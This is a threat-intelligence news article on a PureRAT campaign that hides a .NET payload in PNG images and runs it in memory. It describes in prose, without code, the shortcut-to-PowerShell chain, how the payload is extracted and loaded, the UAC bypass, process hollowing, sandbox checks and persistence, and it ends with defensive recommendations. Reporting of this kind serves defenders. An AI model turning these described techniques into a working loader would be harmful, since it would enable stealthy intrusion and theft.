Stealthy PureRAT Malware Campaign Conceals Payloads in PNG Images for Fileless Execution
A newly identified malware campaign is leveraging the PureRAT remote access trojan (RAT) to infiltrate Windows systems by embedding malicious code within seemingly innocuous PNG image files. This sophisticated method allows the malware to execute directly in memory, leaving minimal traces on disk and evading traditional security measures.
Infection Chain Overview
The attack initiates with a deceptive Windows shortcut file (.lnk) that, when opened, triggers a concealed PowerShell command. This command reaches out to a remote server to download a PNG image containing a Base64-encoded portable executable (PE) file hidden through steganography. To the user, the image appears normal, but it secretly harbors the malicious payload.
Security researchers at Trellix have analyzed this campaign, highlighting the multi-layered obfuscation techniques employed. The PowerShell script used in the second stage is heavily obfuscated, incorporating extraneous data to mislead analysis tools. Additionally, the malware checks for virtualized environments like VMware and QEMU, terminating itself if such conditions are detected to avoid sandbox analysis.
Execution and Persistence Mechanisms
Once activated, PureRAT conducts host fingerprinting to gather information on installed security software, hardware identifiers, and user privileges. It bypasses User Account Control (UAC) using cmstp.exe and employs process hollowing to inject malicious code into the legitimate msbuild.exe process, allowing it to operate under the guise of a trusted Windows component.
The malware establishes a connection to a command-and-control (C2) server, enabling operators to deploy additional modules for keylogging, system monitoring, or remote desktop access. To maintain persistence, PureRAT creates a scheduled task within the Windows registry, ensuring it re-executes upon system startup.
Technical Details of the Infection Mechanism
The core technique involves embedding the malicious payload within a PNG image file. After the initial .lnk file triggers the hidden PowerShell command, the script downloads the PNG from the attacker’s server. This image contains a Base64-encoded PE file concealed within its data. The script identifies the payload’s start and end markers, extracts the encoded data, performs character replacements, reverses the data, decodes it from Base64, and converts it into a byte array.
This byte array is then loaded directly into memory as a compiled .NET assembly using System.Reflection.Assembly.Load(). All malicious operations occur within the PowerShell process’s memory space, leaving the original msbuild.exe binary on disk untouched and maintaining its status as a signed, legitimate Windows file. This approach effectively evades file-based detection mechanisms.
The .NET DLL embedded within the PNG serves as the next-stage loader, protected by .NET Reactor obfuscation. Its Main function invokes a Triple DES decryption routine, sourcing the key and initialization vector from Base64-encoded strings within the file.
Implications and Recommendations
This campaign underscores the evolving tactics of cybercriminals who are increasingly adopting fileless malware techniques to evade detection. By embedding payloads within image files and executing them directly in memory, attackers can bypass traditional security solutions that rely on file-based scanning.
To mitigate such threats, organizations should:
– Enhance Endpoint Detection and Response (EDR) Capabilities: Implement solutions that monitor for suspicious behavior in memory and detect anomalies associated with fileless malware.
– Educate Users on Phishing Tactics: Train employees to recognize and avoid suspicious emails and attachments, as social engineering remains a primary vector for malware delivery.
– Regularly Update Security Software: Ensure that all security tools are up-to-date to recognize and respond to the latest threats.
– Implement Network Segmentation: Limit the spread of malware by segmenting networks and restricting access to critical systems.
By adopting a multi-layered security approach and staying informed about emerging threats, organizations can better defend against sophisticated malware campaigns like the one involving PureRAT.
